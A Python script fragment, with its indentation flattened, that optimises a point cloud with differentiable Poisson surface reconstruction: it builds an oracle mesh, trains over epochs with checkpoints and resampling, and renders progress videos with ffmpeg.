from src.dpsr import DPSR
dpsr_tmp = DPSR(res=(cfg['model']['grid_res'],
cfg['model']['grid_res'],
cfg['model']['grid_res']),
sig=cfg['model']['psr_sigma']).to(device)
target = dpsr_tmp(pts_gt, norms_gt).unsqueeze(1).to(device)
target = torch.tanh(target)
s = target.shape[-1] # size of psr_grid
psr_grid_numpy = target.squeeze().detach().cpu().numpy()
verts, faces, _, _ = measure.marching_cubes(psr_grid_numpy)
verts = verts / s * 2. - 1 # [-1, 1]
mesh = o3d.geometry.TriangleMesh()
mesh.vertices = o3d.utility.Vector3dVector(verts)
mesh.triangles = o3d.utility.Vector3iVector(faces)
outdir_mesh = os.path.join(cfg['train']['out_dir'], 'oracle_mesh.ply')
o3d.io.write_triangle_mesh(outdir_mesh, mesh)
# initialize the source point cloud given an input mesh
if 'input_mesh' in cfg['train'].keys() and \
os.path.isfile(cfg['train']['input_mesh']):
if cfg['train']['input_mesh'].split('/')[-2] == 'mesh':
mesh_tmp = trimesh.load_mesh(cfg['train']['input_mesh'])
verts = torch.from_numpy(mesh_tmp.vertices[None]).float().to(device)
faces = torch.from_numpy(mesh_tmp.faces[None]).to(device)
mesh = Meshes(verts=verts, faces=faces)
points, normals = sample_points_from_meshes(mesh,
num_samples=cfg['data']['num_points'], return_normals=True)
# mesh is saved in the original scale of the gt
points -= center.float().to(device)
points /= scale.float().to(device)
points *= 0.9
# make sure the points are within the range of [0, 1)
points = points / 2. + 0.5
else:
# directly initialize from a point cloud
pcd = o3d.io.read_point_cloud(cfg['train']['input_mesh'])
points = torch.from_numpy(np.array(pcd.points)[None]).float().to(device)
normals = torch.from_numpy(np.array(pcd.normals)[None]).float().to(device)
points -= center.float().to(device)
points /= scale.float().to(device)
points *= 0.9
points = points / 2. + 0.5
else: #! initialize our source point cloud from a sphere
sphere_radius = cfg['model']['sphere_radius']
sphere_mesh = trimesh.creation.uv_sphere(radius=sphere_radius,
count=[256,256])
points, idx = sphere_mesh.sample(cfg['data']['num_points'],
return_index=True)
points += 0.5 # make sure the points are within the range of [0, 1)
normals = sphere_mesh.face_normals[idx]
points = torch.from_numpy(points).unsqueeze(0).to(device)
normals = torch.from_numpy(normals).unsqueeze(0).to(device)
points = torch.log(points/(1-points)) # inverse sigmoid
inputs = torch.cat([points, normals], axis=-1).float()
inputs.requires_grad = True
model = None # no network
# initialize optimizer
cfg['train']['schedule']['pcl']['initial'] = cfg['train']['lr_pcl']
print('Initial learning rate:', cfg['train']['schedule']['pcl']['initial'])
if 'schedule' in cfg['train']:
lr_schedules = get_learning_rate_schedules(cfg['train']['schedule'])
else:
lr_schedules = None
optimizer = update_optimizer(inputs, cfg,
epoch=0, model=model, schedule=lr_schedules)
try:
# load model
state_dict = torch.load(os.path.join(cfg['train']['out_dir'], 'model.pt'))
if ('pcl' in state_dict.keys()) & (state_dict['pcl'] is not None):
inputs = state_dict['pcl'].to(device)
inputs.requires_grad = True
optimizer = update_optimizer(inputs, cfg,
epoch=state_dict.get('epoch'), schedule=lr_schedules)
out = "Load model from epoch %d" % state_dict.get('epoch', 0)
print(out)
logger.info(out)
except:
state_dict = dict()
start_epoch = state_dict.get('epoch', -1)
trainer = Trainer(cfg, optimizer, device=device)
runtime = {}
runtime['all'] = AverageMeter()
# training loop
for epoch in range(start_epoch+1, cfg['train']['total_epochs']+1):
# schedule the learning rate
if (epoch>0) & (lr_schedules is not None):
if (epoch % lr_schedules[0].interval == 0):
adjust_learning_rate(lr_schedules, optimizer, epoch)
if len(lr_schedules) >1:
print('[epoch {}] net_lr: {}, pcl_lr: {}'.format(epoch,
lr_schedules[0].get_learning_rate(epoch),
lr_schedules[1].get_learning_rate(epoch)))
else:
print('[epoch {}] adjust pcl_lr to: {}'.format(epoch,
lr_schedules[0].get_learning_rate(epoch)))
start = time.time()
loss, loss_each = trainer.train_step(data, inputs, model, epoch)
runtime['all'].update(time.time() - start)
if epoch % cfg['train']['print_every'] == 0:
log_text = ('[Epoch %02d] loss=%.5f') %(epoch, loss)
if loss_each is not None:
for k, l in loss_each.items():
if l.item() != 0.:
log_text += (' loss_%s=%.5f') % (k, l.item())
log_text += (' time=%.3f / %.3f') % (runtime['all'].val,
runtime['all'].sum)
logger.info(log_text)
print(log_text)
# visualize point clouds and meshes
if (epoch % cfg['train']['visualize_every'] == 0) & (vis is not None):
trainer.visualize(data, inputs, model, epoch, o3d_vis=vis)
# save outputs
if epoch % cfg['train']['save_every'] == 0:
trainer.save_mesh_pointclouds(inputs, epoch,
center.cpu().numpy(),
scale.cpu().numpy()*(1/0.9))
# save checkpoints
if (epoch > 0) & (epoch % cfg['train']['checkpoint_every'] == 0):
state = {'epoch': epoch}
pcl = None
if isinstance(inputs, torch.Tensor):
state['pcl'] = inputs.detach().cpu()
torch.save(state, os.path.join(cfg['train']['dir_model'],
'%04d' % epoch + '.pt'))
print("Save new model at epoch %d" % epoch)
logger.info("Save new model at epoch %d" % epoch)
torch.save(state, os.path.join(cfg['train']['out_dir'], 'model.pt'))
# resample and gradually add new points to the source pcl
if (epoch > 0) & \
(cfg['train']['resample_every']!=0) & \
(epoch % cfg['train']['resample_every'] == 0) & \
(epoch < cfg['train']['total_epochs']):
inputs = trainer.point_resampling(inputs)
optimizer = update_optimizer(inputs, cfg,
epoch=epoch, model=model, schedule=lr_schedules)
trainer = Trainer(cfg, optimizer, device=device)
# visualize the Open3D outputs
if cfg['train']['o3d_show']:
out_video_dir = os.path.join(cfg['train']['out_dir'],
'vis/o3d/video.mp4')
if os.path.isfile(out_video_dir):
os.system('rm {}'.format(out_video_dir))
os.system('ffmpeg -framerate 30 \
-start_number 0 \
-i {}/vis/o3d/%04d.jpg \
-pix_fmt yuv420p \
-crf 17 {}'.format(cfg['train']['out_dir'], out_video_dir))
out_video_dir = os.path.join(cfg['train']['out_dir'],
'vis/o3d/video_pcd.mp4')
if os.path.isfile(out_video_dir):
os.system('rm {}'.format(out_video_dir))
os.system('ffmpeg -framerate 30 \
-start_number 0 \
-i {}/vis/o3d/%04d_pcd.jpg \
-pix_fmt yuv420p \
-crf 17 {}'.format(cfg['train']['out_dir'], out_video_dir))
print('Video saved.')
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.